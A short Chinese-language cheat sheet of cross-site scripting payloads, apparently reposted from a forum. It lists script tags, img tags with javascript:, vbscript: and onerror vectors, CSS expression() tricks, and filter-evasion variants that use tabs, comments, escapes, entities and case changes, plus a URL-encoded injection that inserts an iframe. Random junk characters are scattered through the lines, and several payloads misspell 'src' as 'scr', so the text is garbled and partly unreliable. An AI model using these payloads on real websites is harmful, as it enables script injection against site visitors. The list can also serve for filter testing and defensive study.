<script>alert("跨站")</script> (最常用)
# \, w8 e9 Z, @% C- f3 s; a<img scr=javascript:alert("跨站")></img>4 i! B, X& k; Q, k3 u: ~/ X
<img scr="javascript: alert(/跨站/)></img>
1 E' U6 T& L7 k$ y7 \% E<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
, e |2 S0 ~( @5 o% Q<img scr="#" onerror=alert(/跨站/)></img>/ K4 s+ ~ n: Q& w5 H
<img scr="#" style="xss:expression(alert(/xss/));"></img>/ g: S+ \2 _* ]& ^% W
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
- Z2 @$ _* j/ b0 R2 _# O<img src=vbscript:msgbox ("xss")></img>
9 `* ^8 f) a1 O. a3 g8 B<style> input {left:expression (alert('xss'))}</style>
* ^6 j0 B( {% ~7 o* {0 b$ U( n<div style={left:expression (alert('xss'))}></div>
8 M1 [( ~9 l# s5 \% N) l6 _& |<div style={left:exp/* */ression (alert('xss'))}></div> {7 m6 W4 V2 T" H& I) j% |
<div style={left:\0065\0078ression (alert('xss'))}></div>2 U- V, k8 P2 Q0 q6 x3 J# y* `
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
3 B+ m8 Q3 o% D: M" C- municode <div style="{left:expRessioN (alert('xss'))}">
$ a2 ?- h3 ] G( S0 ~, L& \: ~
* t9 d# r* a( W; A7 B"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["7 |6 E" _9 @& A* |1 h, ? u- j
|